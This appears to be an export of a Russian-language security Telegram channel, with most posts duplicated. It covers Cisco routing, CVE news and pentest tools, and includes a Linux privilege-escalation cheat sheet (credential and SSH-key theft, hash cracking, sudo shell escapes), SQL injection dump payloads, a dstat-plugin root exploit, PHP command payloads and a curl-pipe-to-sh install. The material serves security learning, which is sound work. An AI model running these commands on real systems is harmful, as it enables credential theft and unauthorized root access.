Настройка маршрутизации на оборудования Cisco 🗞
🔸Настройка статической маршрутизации:
ip route 172.16.0.0 255.255.255.128 Serial0/0/0 - это команда для ввода статического маршрута
Вкратце: ip route - это команда, говорящая роутеру, что сейчас будет введен статический маршрут; 172.16.0.0 - это удаленная и неизвестная роутеру сеть; 255.255.255.128 - это маска удаленной сети; serial0/0/0 - это на какой шлюз мы хотим переслать пакеты, т.е адрес/интерфейс другого роутера
🔸Настройка RIP:
router rip - этой командой мы включаем протокол RIP на маршрутизаторе, и оказываемся в режиме конфигурации протокола
version 2 - включаем RIP Version 2
no auto-summary - отключаем автоматическое суммирование маршрутов
network <IP> - вводим сети, которые будут передаваться другим роутерам
🔸Настройка OSPF:
router ospf <NUM> - назначаем процесс ospf
router-id <ID> - прописываем id (1.1.1.1 к примеру)
network <IP> <WILCD_CARD_MASK> area 0 – назначаем подключенные сети к роутеру
passive-interface <INTERFACE> - отключаем интерфейсы
🔸Настройка статической маршрутизации:
ip route 172.16.0.0 255.255.255.128 Serial0/0/0 - это команда для ввода статического маршрута
Вкратце: ip route - это команда, говорящая роутеру, что сейчас будет введен статический маршрут; 172.16.0.0 - это удаленная и неизвестная роутеру сеть; 255.255.255.128 - это маска удаленной сети; serial0/0/0 - это на какой шлюз мы хотим переслать пакеты, т.е адрес/интерфейс другого роутера
🔸Настройка RIP:
router rip - этой командой мы включаем протокол RIP на маршрутизаторе, и оказываемся в режиме конфигурации протокола
version 2 - включаем RIP Version 2
no auto-summary - отключаем автоматическое суммирование маршрутов
network <IP> - вводим сети, которые будут передаваться другим роутерам
🔸Настройка OSPF:
router ospf <NUM> - назначаем процесс ospf
router-id <ID> - прописываем id (1.1.1.1 к примеру)
network <IP> <WILCD_CARD_MASK> area 0 – назначаем подключенные сети к роутеру
passive-interface <INTERFACE> - отключаем интерфейсы
#linux
Linux Privilege Escalation Cheat Sheet 🗞
🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --noscript=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Linux Privilege Escalation Cheat Sheet 🗞
🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --noscript=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
👍4
#sql
Основные моменты по SQL-инъекциям 💉
🔸In-Band SQL Injection
In-Band SQL Injection - самый простой тип для обнаружения и эксплуатации; In-Band означает, что для эксплуатации уязвимости используется один и тот же метод связи, а также получение результатов, например, обнаружение уязвимости SQL Injection на странице веб-сайта, а затем возможность извлечь данные из базы данных на той же странице.
🔸Error-Based -SQL
Этот тип SQL-инъекции наиболее полезен для легкого получения информации о структуре базы данных, поскольку сообщения об ошибках из базы данных выводятся прямо на экран браузера. Часто его можно использовать для перечисления всей базы данных.
Union-Based SQL Injection
Этот тип инъекции использует оператор SQL UNION вместе с оператором SELECT для возврата дополнительных результатов на страницу. Этот метод является наиболее распространенным способом извлечения больших объемов данных через уязвимость SQL Injection.
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
🔸Blind-SQLi
В отличие от In-Band SQL injection, когда мы можем видеть результаты нашей атаки прямо на экране, blind SQLi - это когда мы практически не получаем обратной связи, чтобы подтвердить, были ли наши введенные запросы успешными или нет, это происходит потому, что сообщения об ошибках отключены, но инъекция все равно работает. Вас может удивить, что для успешного перебора целой базы данных нам нужен лишь небольшой отклик.
🔸Boolean-Based
SQL-инъекция на основе булевых функций относится к ответу, который мы получаем в ответ на наши попытки инъекции и который может быть истинным/ложным, да/нет, вкл/выкл, 1/0 или любым другим ответом, который может иметь только два исхода. Этот результат подтверждает, что наша полезная нагрузка SQL Injection была либо успешной, либо нет. На первый взгляд, вам может показаться, что такой ограниченный ответ не может дать много информации. Но на самом деле, используя только эти два ответа, можно перечислить структуру и содержимое целой базы данных.
admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
🔸Time-Based SQLi
Слепая SQL-инъекция, основанная на времени, очень похожа на вышеописанную булеву инъекцию, поскольку отправляются те же самые запросы, но нет визуального индикатора того, что ваши запросы на этот раз неправильные или правильные. Вместо этого индикатором правильности запроса служит время, которое требуется для его выполнения. Эта временная задержка вводится за счет использования встроенных методов, таких как SLEEP(x), наряду с оператором UNION. Метод SLEEP() будет выполняться только после успешного выполнения оператора UNION SELECT.
Так, например, при попытке определить количество столбцов в таблице можно использовать следующий запрос:
admin123' UNION SELECT SLEEP(5);--.
Методы идентификации SQL-injection:
▫️Самый очевидный метод - ввести в поля одинарную кавычку ' и проверить ошибки.
▫️Вводите булевы условия типа "ИЛИ 1=1", "ИЛИ 4=9" и т.д. и выявляйте аномалии в ответах.
▫️Фаззинг с полезными нагрузками SQL и наблюдение за ошибками
▫️Фаззинг с различными полезными нагрузками, основанными на времени, и проверка задержек в ответах
▫️SqlMap
▫️Acunetix, BurpSuite, OWASP ZAP, Wapiti
Основные моменты по SQL-инъекциям 💉
🔸In-Band SQL Injection
In-Band SQL Injection - самый простой тип для обнаружения и эксплуатации; In-Band означает, что для эксплуатации уязвимости используется один и тот же метод связи, а также получение результатов, например, обнаружение уязвимости SQL Injection на странице веб-сайта, а затем возможность извлечь данные из базы данных на той же странице.
🔸Error-Based -SQL
Этот тип SQL-инъекции наиболее полезен для легкого получения информации о структуре базы данных, поскольку сообщения об ошибках из базы данных выводятся прямо на экран браузера. Часто его можно использовать для перечисления всей базы данных.
Union-Based SQL Injection
Этот тип инъекции использует оператор SQL UNION вместе с оператором SELECT для возврата дополнительных результатов на страницу. Этот метод является наиболее распространенным способом извлечения больших объемов данных через уязвимость SQL Injection.
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
🔸Blind-SQLi
В отличие от In-Band SQL injection, когда мы можем видеть результаты нашей атаки прямо на экране, blind SQLi - это когда мы практически не получаем обратной связи, чтобы подтвердить, были ли наши введенные запросы успешными или нет, это происходит потому, что сообщения об ошибках отключены, но инъекция все равно работает. Вас может удивить, что для успешного перебора целой базы данных нам нужен лишь небольшой отклик.
🔸Boolean-Based
SQL-инъекция на основе булевых функций относится к ответу, который мы получаем в ответ на наши попытки инъекции и который может быть истинным/ложным, да/нет, вкл/выкл, 1/0 или любым другим ответом, который может иметь только два исхода. Этот результат подтверждает, что наша полезная нагрузка SQL Injection была либо успешной, либо нет. На первый взгляд, вам может показаться, что такой ограниченный ответ не может дать много информации. Но на самом деле, используя только эти два ответа, можно перечислить структуру и содержимое целой базы данных.
admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
🔸Time-Based SQLi
Слепая SQL-инъекция, основанная на времени, очень похожа на вышеописанную булеву инъекцию, поскольку отправляются те же самые запросы, но нет визуального индикатора того, что ваши запросы на этот раз неправильные или правильные. Вместо этого индикатором правильности запроса служит время, которое требуется для его выполнения. Эта временная задержка вводится за счет использования встроенных методов, таких как SLEEP(x), наряду с оператором UNION. Метод SLEEP() будет выполняться только после успешного выполнения оператора UNION SELECT.
Так, например, при попытке определить количество столбцов в таблице можно использовать следующий запрос:
admin123' UNION SELECT SLEEP(5);--.
Методы идентификации SQL-injection:
▫️Самый очевидный метод - ввести в поля одинарную кавычку ' и проверить ошибки.
▫️Вводите булевы условия типа "ИЛИ 1=1", "ИЛИ 4=9" и т.д. и выявляйте аномалии в ответах.
▫️Фаззинг с полезными нагрузками SQL и наблюдение за ошибками
▫️Фаззинг с различными полезными нагрузками, основанными на времени, и проверка задержек в ответах
▫️SqlMap
▫️Acunetix, BurpSuite, OWASP ZAP, Wapiti
👍2
Немного про UAC и его методы обхода 📄
#windows
Контроль учетных записей пользователей (UAC) - это функция безопасности
Windows, которая заставляет любой новый процесс по умолчанию запускаться в
контексте безопасности непривилегированной учетной записи. Эта политика
применяется к процессам, запущенным любым пользователем, включая самих
администраторов. Идея заключается в том, что мы не можем полагаться только на
личность пользователя, чтобы определить, должны ли некоторые действия быть
разрешены.
https://telegra.ph/Bypass-UAC-07-18
#windows
Контроль учетных записей пользователей (UAC) - это функция безопасности
Windows, которая заставляет любой новый процесс по умолчанию запускаться в
контексте безопасности непривилегированной учетной записи. Эта политика
применяется к процессам, запущенным любым пользователем, включая самих
администраторов. Идея заключается в том, что мы не можем полагаться только на
личность пользователя, чтобы определить, должны ли некоторые действия быть
разрешены.
https://telegra.ph/Bypass-UAC-07-18
Telegraph
Bypass UAC
Контроль учетных записей пользователей (UAC) - это функция безопасности Windows, которая заставляет любой новый процесс по умолчанию запускаться в контексте безопасности непривилегированной учетной записи. Эта политика применяется к процессам, запущенным…
#ssti
SSTI Payload Generator ⚒
Данный инструмент генерирует полезную нагрузку для эксплуатации SSTI-Java.
Применял много раз для решение машин на HTB.
Сам инструмент:
https://github.com/VikasVarshney/ssti-payload
SSTI Payload Generator ⚒
Данный инструмент генерирует полезную нагрузку для эксплуатации SSTI-Java.
Применял много раз для решение машин на HTB.
Сам инструмент:
https://github.com/VikasVarshney/ssti-payload
GitHub
GitHub - VikasVarshney/ssti-payload: SSTI Payload Generator
SSTI Payload Generator. Contribute to VikasVarshney/ssti-payload development by creating an account on GitHub.
#k8s
Про безопасность в Kubernetes📄
Среди причин, по которым Kubernetes получил столь широкое распространение - гибкость и отсутствие фрагментации. Возможно, Kubernetes не совершенен, но нельзя отрицать, что многим он нравится. Действительно, Kubernetes обеспечивает оркестровку для более чем трех четвертей контейнеризированных приложений сегодня. Но также не стоит забывать, что Kubernetes имеет свои проблемы с точки зрения безопасности, сегодня я предлагаю рассмотреть часть из них
https://telegra.ph/Pro-bezopasnost-v-K8S-08-05
Про безопасность в Kubernetes📄
Среди причин, по которым Kubernetes получил столь широкое распространение - гибкость и отсутствие фрагментации. Возможно, Kubernetes не совершенен, но нельзя отрицать, что многим он нравится. Действительно, Kubernetes обеспечивает оркестровку для более чем трех четвертей контейнеризированных приложений сегодня. Но также не стоит забывать, что Kubernetes имеет свои проблемы с точки зрения безопасности, сегодня я предлагаю рассмотреть часть из них
https://telegra.ph/Pro-bezopasnost-v-K8S-08-05
Telegraph
Про безопасность в K8S
Вообще, перед тем как рассматривать проблемы в Kubernetes, стоит разобрать основы. И так для чего нужен Kubernetes (K8S)? K8S нужен для автоматизации развертывания контейнизированных приложений. Т.е используемая технология - Docker. А основной используемый…
#privileges
Kernel privilege escalation vulnerability collection
Коллекция уязвимостей для повышения привилегий ядра на UNIX/Windows системах, со средой компиляции, деталями уязвимости, исполняемым файлом и т.п
https://github.com/Ascotbe/Kernelhub
Kernel privilege escalation vulnerability collection
⚒Коллекция уязвимостей для повышения привилегий ядра на UNIX/Windows системах, со средой компиляции, деталями уязвимости, исполняемым файлом и т.п
https://github.com/Ascotbe/Kernelhub
GitHub
GitHub - Ascotbe/Kernelhub: :palm_tree:Linux、macOS、Windows Kernel privilege escalation vulnerability collection, with compilation…
:palm_tree:Linux、macOS、Windows Kernel privilege escalation vulnerability collection, with compilation environment, demo GIF map, vulnerability details, executable file (提权漏洞合集) - GitHub - Ascotbe...
❤1🔥1
#exploit
0-day RCE vulnerability on Microsoft Exchange Server✉️
Кратко: была найдена новая уязвимость в Microsoft Exchange Server
Как ее задетектить у себя на сервере?
🔸Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter "*.log" | Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200
Сканер по данной уязвимости:
🔸https://github.com/VNCERT-CC/0dayex-checker
Все подробности можно посмотреть здесь:
🔸https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html
0-day RCE vulnerability on Microsoft Exchange Server✉️
Кратко: была найдена новая уязвимость в Microsoft Exchange Server
Как ее задетектить у себя на сервере?
🔸Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter "*.log" | Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200
Сканер по данной уязвимости:
🔸https://github.com/VNCERT-CC/0dayex-checker
Все подробности можно посмотреть здесь:
🔸https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html
GitHub
GitHub - VNCERT-CC/0dayex-checker: Zeroday Microsoft Exchange Server checker (Virtual Patching checker)
Zeroday Microsoft Exchange Server checker (Virtual Patching checker) - VNCERT-CC/0dayex-checker
Forwarded from NETRUNNER GROUP (Сергей Зыбнев)
#ЦиклСтатей_Сети
В этой статье мы разберем основные сетевые протоколы и на каких портах они работают по умолчанию.
Стандартные порты-протоколы.
При изучении соблюдайте порядок ❤️
В этой статье мы разберем основные сетевые протоколы и на каких портах они работают по умолчанию.
Стандартные порты-протоколы.
При изучении соблюдайте порядок ❤️
Telegraph
Стандартные порты-протоколы.
В этой статье мы разберем основные сетевые протоколы и на каких портах они работают по умолчанию. 20-21 File Transfer Protocol - (FTP, FTP-DATA) FTP (File Transfer Protocol) — это протокол доступа, предназначенный для удаленной передачи файлов. Простыми словами…
#cve
CVE-2022-40684
В продуктах Fortinet (FortiOS, FortiProxy и FortiSwitchManager) была найдена уязвимость, позволяющая обойти аутентификацию и конфигурацию LDAP, путем извлечения пользователей с привилегиями администратора
Все нужные ресурсы:
🔸https://github.com/carlosevieira/CVE-2022-40684
🔸https://www.usergate.com/ru/security-reports/CVE-2022-40684
CVE-2022-40684
В продуктах Fortinet (FortiOS, FortiProxy и FortiSwitchManager) была найдена уязвимость, позволяющая обойти аутентификацию и конфигурацию LDAP, путем извлечения пользователей с привилегиями администратора
Все нужные ресурсы:
🔸https://github.com/carlosevieira/CVE-2022-40684
🔸https://www.usergate.com/ru/security-reports/CVE-2022-40684
GitHub
GitHub - carlosevieira/CVE-2022-40684: PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only) - carlosevieira/CVE-2022-40684
👍1
#cve202233679
Что такое Kerberos и что за CVE-2022-33679?
Решил разобраться с Kerberos, а тут еще новая вулна появилась с ней.
Данная вулна позволяет аутентифицироваться как другой пользователь, НО если пользователь был настроен на отключение стандартных требований предварительной аутентификации.
Читать тут...
Если кого-то интересует только CVE, то все полезные ресурсы вы найдете здесь:
🔘https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
🔘https://github.com/Bdenneu/CVE-2022-33679
Что такое Kerberos и что за CVE-2022-33679?
Решил разобраться с Kerberos, а тут еще новая вулна появилась с ней.
Данная вулна позволяет аутентифицироваться как другой пользователь, НО если пользователь был настроен на отключение стандартных требований предварительной аутентификации.
Читать тут...
Если кого-то интересует только CVE, то все полезные ресурсы вы найдете здесь:
🔘https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
🔘https://github.com/Bdenneu/CVE-2022-33679
Telegraph
Что такое Kerberos и что за CVE-2022-33679?
Основы Kerberos - это протокол для аутентификации запросов на обслуживание между доверенными узлами в недоверенной сети. Данный протокол достаточно широко распространен, а с момента выхода Windows 2000 компания Microsoft использует протокол Kerberos в качестве…
👍1🔥1
#windows
Полезные тулзы во время пентеста Active Directory
Список самый простой, но интересный:
🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay
Полезные тулзы во время пентеста Active Directory
Список самый простой, но интересный:
🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay
GitHub
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
Impacket is a collection of Python classes for working with network protocols. - fortra/impacket
❤1
Forwarded from Proxy Bar
Рановато, но таки да
ТОП 10 из 2022
1. Follina (CVE-2022-30190)
2. Log4Shell (CVE-2021-44228)
3. Spring4Shell (CVE-2022-22965)
4. F5 BIG-IP (CVE-2022-1388)
5. Google Chrome zero-day (CVE-2022-0609)
6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)
7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)
8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)
9. Atlassian Confluence RCE flaw (CVE-2022-26134)
10. Zyxel RCE vulnerability (CVE-2022-30525)
ТОП 10 из 2022
1. Follina (CVE-2022-30190)
2. Log4Shell (CVE-2021-44228)
3. Spring4Shell (CVE-2022-22965)
4. F5 BIG-IP (CVE-2022-1388)
5. Google Chrome zero-day (CVE-2022-0609)
6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)
7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)
8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)
9. Atlassian Confluence RCE flaw (CVE-2022-26134)
10. Zyxel RCE vulnerability (CVE-2022-30525)
🔥2🤔1
Смотрим Flipper Zero и немного модифицируем
Думал еще потыкать API-ху, но разрабы все ещё ее пилят. Поэтому ждем релиза документации
https://telegra.ph/Smotrim-i-nemnogo-modificiruem-Flipper-Zero-12-07
Думал еще потыкать API-ху, но разрабы все ещё ее пилят. Поэтому ждем релиза документации
https://telegra.ph/Smotrim-i-nemnogo-modificiruem-Flipper-Zero-12-07
Telegraph
Смотрим и немного модифицируем Flipper Zero
Flipper Zero - это портативный мультиинструмент для пентестеров как игрушка. Он предназначен для взлома цифровых устройств, таких как радио-протоколы, системы контроля доступа, аппаратное обеспечение и т.п. Он полностью с открытым исходным кодом и настраиваемый…
🔥6
Forwarded from Похек
Nuclei v2.8.0 - Fuzz all the way!
Объявление о выходе Nuclei v2.8.0 с новыми возможностями фаззинга, общими переменными для рабочих процессов, загрузкой шаблонов GitHub/AWS S3, интеграцией с asnmap, uncover и httpx и, конечно, многим другим!
Это лишь несколько основных моментов из 30+ улучшений в этом релизе. Читайте дальше, чтобы ознакомиться со всеми значительными обновлениями.
Мы также хотим поблагодарить сообщество ProjectDiscovery за 5+ вкладов, которые они внесли в Nuclei v2.8.0! В ProjectDiscovery сообщество является основой; мы гордимся нашим сообществом и командой. Мы надеемся, что вам понравится новый релиз. Счастливого взлома!
#tools
Объявление о выходе Nuclei v2.8.0 с новыми возможностями фаззинга, общими переменными для рабочих процессов, загрузкой шаблонов GitHub/AWS S3, интеграцией с asnmap, uncover и httpx и, конечно, многим другим!
Это лишь несколько основных моментов из 30+ улучшений в этом релизе. Читайте дальше, чтобы ознакомиться со всеми значительными обновлениями.
Мы также хотим поблагодарить сообщество ProjectDiscovery за 5+ вкладов, которые они внесли в Nuclei v2.8.0! В ProjectDiscovery сообщество является основой; мы гордимся нашим сообществом и командой. Мы надеемся, что вам понравится новый релиз. Счастливого взлома!
#tools
🔥3
Kubernetes + Wireshark = KubeShark
По факту, эта тулза позволяет просматривать трафик вашего кластера на K8S.
Если хотите посмотреть данную тулзу, то:
Проверяем, что есть доступ к DockerHub
Совершаем установку:
Запускаем:
Выбираем нужный POD и играемся:
Также можно выбрать определенный namespace:
А можно все сразу:
Всю документацию можно найти здесь
По факту, эта тулза позволяет просматривать трафик вашего кластера на K8S.
Если хотите посмотреть данную тулзу, то:
Проверяем, что есть доступ к DockerHub
Совершаем установку:
sh <(curl -Ls https://kubeshark.co/install) Запускаем:
kubeshark tapВыбираем нужный POD и играемся:
kubeshark tap catalogue-b87b45784-sxc8qТакже можно выбрать определенный namespace:
kubeshark tap -n sock-shopА можно все сразу:
kubeshark tap -AВсю документацию можно найти здесь
GitHub
GitHub - kubeshark/kubeshark: API traffic analyzer for Kubernetes, providing deep packet inspection with complete API and Kubernetes…
API traffic analyzer for Kubernetes, providing deep packet inspection with complete API and Kubernetes contexts, retaining cluster-wide L4 traffic (PCAP), and using minimal production compute resou...
❤1👏1
Forwarded from Похек
Пак свежих и эксплуатируемых CVE для Apple:
CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
CVE-2022-22594 (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32893 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-32894 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32917 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-42827 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
CVE-2022-22594 (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32893 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-32894 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32917 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-42827 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
🔥3👍1
Dstat Privilege Escalation
dstat можно использовать для мониторинга и просмотра системных ресурсов. Он поддерживает настраиваемые плагины. Поэтому мы можем создать вредоносный плагин, выполняющий код и запустить dstat с правами root.
Находим директорию с dstat:
Создаем плагин в той же директории, где и dstat с последующим кодом:
Смотрим, что хост видит плагин:
Запускаем:
И получаем рута:
dstat можно использовать для мониторинга и просмотра системных ресурсов. Он поддерживает настраиваемые плагины. Поэтому мы можем создать вредоносный плагин, выполняющий код и запустить dstat с правами root.
Находим директорию с dstat:
find / -type d -name dstat 2>/dev/nullСоздаем плагин в той же директории, где и dstat с последующим кодом:
import os
os.system('chmod +s /usr/bin/bash')Смотрим, что хост видит плагин:
dstat --list | grep <plugin_name>Запускаем:
doas -u root /usr/bin/dstat –<plugin_name>
И получаем рута:
bash -pPHP Filter Chain Generator
Если вам нужно обойти WAF или другой механизм проверки, то существует интересная тулза, которая помогает выполнить RCE без загрузки файла, естественно если вы можете играться с параметрами php.
Но сгенерированный результат получается длинным, а на сайте может быть ограничение по количеству символов.
Следовательно, нам нужно использовать короткие формы php, чтобы сделать нашу полезную нагрузку как можно короче
Так php тэг, можно просто представить в следующем виде <?php ?> :
А функцию system('<cmd>'), мы можем просто заменить на
И самый простетский пэйлоад будет выглядеть так
Если вам нужно обойти WAF или другой механизм проверки, то существует интересная тулза, которая помогает выполнить RCE без загрузки файла, естественно если вы можете играться с параметрами php.
Но сгенерированный результат получается длинным, а на сайте может быть ограничение по количеству символов.
Следовательно, нам нужно использовать короткие формы php, чтобы сделать нашу полезную нагрузку как можно короче
Так php тэг, можно просто представить в следующем виде <?php ?> :
<?= ?>А функцию system('<cmd>'), мы можем просто заменить на
``И самый простетский пэйлоад будет выглядеть так
<?= `<cmd>` ?>GitHub
GitHub - synacktiv/php_filter_chain_generator
Contribute to synacktiv/php_filter_chain_generator development by creating an account on GitHub.
❤1👏1